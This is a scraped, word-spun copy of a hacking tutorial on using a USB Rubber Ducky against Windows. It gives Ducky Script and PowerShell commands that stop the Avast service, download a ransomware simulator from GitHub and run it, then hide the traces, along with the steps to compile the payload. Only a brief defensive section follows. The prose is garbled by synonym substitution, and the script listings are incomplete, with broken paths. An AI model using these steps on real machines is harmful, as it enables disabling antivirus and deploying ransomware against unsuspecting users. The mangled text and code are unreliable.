4 months ago

How to Use the USB Rubber Ducky to Disable Antivirus Software & Install Ransomware « Null Byte :: WonderHowTo

Ransomware is actually software in which encrypts a victim’s entire hard drive, blocking access to their files unless they pay a ransom to the attacker to get the decryption key. In in which tutorial, you’ll learn how easy the item is actually to use the USB Rubber Ducky, which is actually disguised as an ordinary flash drive, to deploy ransomware on a victim’s computer within seconds. With an attack in which only takes a moment, you’ll need to know how to defend yourself.

The USB Rubber Ducky

To deliver the ransomware to a target computer, we’re going to use the USB Rubber Ducky. In a nutshell, the USB Rubber Ducky is actually a rogue device developed by Hak5 in which uses keystroke injection to trick your target computer into thinking the item’s a keyboard, then proceeds to automatically type the key sequence programmed into its payload. in which takes advantage of the inherent trust operating systems have in human interface devices (HIDs).

If you haven’t used the USB Rubber Ducky before, I highly recommend in which you give the item a try. the item’s fairly simple along with easy to get the hang of quickly, creating the item ideal for beginner hackers. For the full rundown on how to use the item, check out SADMIN’s articles, which give you detailed instructions on how to create along with deliver payloads.

Don’t Miss: How to Load & Use Keystroke Injection Payloads on the USB Rubber Ducky

The inside of a USB Rubber Ducky. Image by SADMIN/Null Byte

Step 1: Using a Few Simple PowerShell Commands

In in which tutorial, I chose to design a payload in which targets computers running a Windows operating system, as the item’s still the most common OS out there. In order to take advantage of the Rubber Ducky’s fast typing speed, we’re going to type along with execute commands through a terminal.

Many of you who are running a Windows operating system are no doubt familiar with the command line. The truth is actually, however, in which command line is actually basically just DOS, which is actually an OS in which was created in 1981 along with hasn’t been updated since 2000.

As such, in which makes the item ridiculously outdated along with an unsuitable shell terminal for more advanced or specific purposes. Instead, we will be using PowerShell, which has been implemented in every desktop type of Windows since Windows 7. in which makes the item a much better platform to mount an attack with the Rubber Ducky.

When designing our payload, there are some PowerShell commands in which are particularly useful to us. For instance get-service “service_name” provides the status of a specific service running, if you exclude a name, along with just type get-service, a table of all system services will be displayed.

Next, we’re going to want to use the command stop-service -force “service_name” which stops the service defined in quotes. To disable a specific antivirus software, you can find the service name through the get-service table along with then use the item in in which command. Adding the -force parameter will force the service to stop. Pretty self-explanatory, right?

Here is actually the PowerShell terminal with system service table displayed.

In order to execute a payload, we need the ability to download files through the internet. In order to do in which in PowerShell, we’re going to use the Windows approximation of “wget” through Linux. For most versions of PowerShell, the command with in which is actually seen below.

Invoke-WebRequest -Uri “http://www.webpage.domain/file ” -OutFile “C:pathfile”

Where the first argument is actually the web location of the file along with the second argument is actually the destination folder. After in which command is actually executed, we need to wait a few seconds for the download to complete before we can open the file. Finally, to open a file through the terminal, we just need to type the path of the file into PowerShell along with press enter.

Step 2: Disabling Antivirus Software with Ducky Script

right now in which we know the PowerShell commands we’re going to use, the item’s time to implement them in Ducky Script, which is actually the language we use to program the USB Rubber Ducky. The first part of our script disables the active antivirus software. I’ve chosen to separate in which part of the script into its own step because disabling antivirus software opens the door for many fun along with exciting possibilities. You can feel free to reuse in which section of code for additional applications.

inside case of my chosen target machine, I’m disabling Avast! Antivirus. However, in which can be applied to any antivirus software. Just make sure to look up the service name by typing the get-service command in PowerShell to adjust for whichever antivirus you might want to target.

Below, you can see the first part of my Ducky Script.

STRING powershell
STRING get-service
STRING stop-service -force “avast! antivirus”
STRING get-service “avast! antivirus”

A few things to note here. GUI + S will press the Windows key along with the S key, opening up a search query. CTRL + SHIFT + ENTER is actually the shortcut to open an application in administrator mode, which is actually required in order to turn services on along with off through the terminal.

The additional ENTER key in which’s pressed after stop-service -force “avast! antivirus” is actually there because Avast immediately opens a confirmation prompt as a security measure. in which section of the script may need to be custom tailored to account for how your specific software reacts to the stop-service command.

Avast! Antivirus being disabled after executing the stop-service command.

Step 3: Downloading & Installing ShinoLocker in Ducky Script

right now in which we have code in which can stop the antivirus software on the target’s computer, we can download along with install the ransomware. When the executable runs, all the user’s files are encrypted, along with therefore become inaccessible to anyone without the key.

For ethical reasons, in in which tutorial, we’re going to use ShinoLocker, which is actually a ransomware simulator in which immediately provides the user which has a link to the key in which will allow them to decrypt their files after the item’s finished running. ShinoLocker was created by Shota Shinogi, who also created the ShinoBot RAT simulator we featured in another article.

Don’t Miss: How to Simulate a RAT on Your Network with ShinoBOT

Fair warning — if you don’t know what you’re doing along with try in which out on your own machine, you may lose all your files, especially if you’re using something additional than ShinoLocker. If you want to test in which, please do so on a virtual machine. In addition, I am not responsible for any personal loss of data, so do in which at your own risk.

Below, we see the portion of our Ducky Script to deploy ShinoLocker.


STRING Invoke-WebRequest -Uri “https://github.com/blackslash-wht/Rubber-Ducky-Install-Ransomware/raw/master/ShinoLockerMSWindowsBuild.exe” -OutFile “c:Tempsl.exe”

DELAY 3000
STRING c:Tempsl.exe

in which section of Ducky Script is actually pretty easy to discern. the item downloads ShinoLocker along with runs the executable file, immediately encrypting all the files on the hard drive. The subsequent keys merely close the open windows along with display the desktop, hiding the immediate traces of our presence.

Don’t Miss: How to Modify the USB Rubber Ducky with Custom Firmware

One last thing to keep in mind is actually the timing associated with the script. The DELAY n command will wait n number of milliseconds. These numbers may need to be adjusted depending on the target machine’s RAM capacity along with internet connection speed. the item’s important to strike a balance between giving the Ducky time to deliver its payload along with brevity in execution.

ShinoLocker downloading; vulnerable files about to be encrypted.

Step 4: Bringing the item All Together & Compiling the Payload

To finish up, append the two segments of the Ducky Script through step 2 along with 3 together into one TXT file. When in which text file is actually created, we need to compile in which file into machine code. Our friends at Hak5 have made in which an easy task which has a custom, easy-to-use compiler inside form of a JAR file in which will build our payload in a cinch.

In order to compile your Ducky Script through a terminal, cd to the directory in which your duckencoder.JAR file is actually in (or specify the entire path inside command) along with type java -jar duckencoder.jar -i “inputfile.txt” -o “d:inject.bin”. Note in which your destination folder should be your microSD card, in my case, drive letter D, along with the output file must be named inject.BIN. Once you develop the binary file loaded on the microSD card, insert the item into your Rubber Ducky along with you’re ready to go!

in which is actually how Ducky Script is actually compiled using PowerShell. Here you can also see the input along with output files.

Step 5: Protecting Against in which Attack

With the SD card loaded, the USB Rubber Ducky is actually ready to take over any Windows system the item’s plugged into with ransomware. While ours is actually a simulation, a real attacker could use the same techniques. In order to protect yourself through these kinds of attacks, make sure to always take common-sense precautions when the item comes to leaving your computer around. Never leave your computer unattended without locking the item first, along with never plug in USB drives if you don’t know where they came through.

Many businesses leave exposed USB ports facing towards clients along with guests, along with often receptionists or additional office staff will leave their workstations unattended. Mistakes like these can lead to critical business data being lost or held for ransom. the item’s important to remember in which your computer can’t tell in which device apart through you, so lock down your computer before you leave the item if you want the item to stay yours.

Did you get trigger-happy along with plug the Ducky into your Windows computer? If so, you may have a hard time seeing your files, since 128-bit AES encryption will make anything hard to read. If you did, don’t panic. Shota is actually a nice hacker, along with his ShinoLocker will provide you the unlock key. Check out the video below to see the process of running along with then unlocking ShinoLocker, if you’re curious what the item looks like or need to unlock your own computer.

Final Words

I trust in which tutorial opened your eyes to the fact in which the USB Rubber Ducky is actually not only quick along with easy to deploy nevertheless also especially dangerous when paired with malware like ransomware. With in which simulation, you can see for yourself why the item’s critical to keep your unlocked computer under your physical control at all times.

For more details on in which specific attack, feel free to reference the GitHub repository with in which tutorial, where you can find the Ducky Script text file, the pre-compiled payload inject.BIN file, along which has a Windows build of ShinoLocker. Happy hacking, along with remember to only use your powers for not bad!

Cover photo along with screenshots by Black Slash/Null Byte

Leave a Comment

Your email address will not be published. Required fields are marked *

2 × 1 =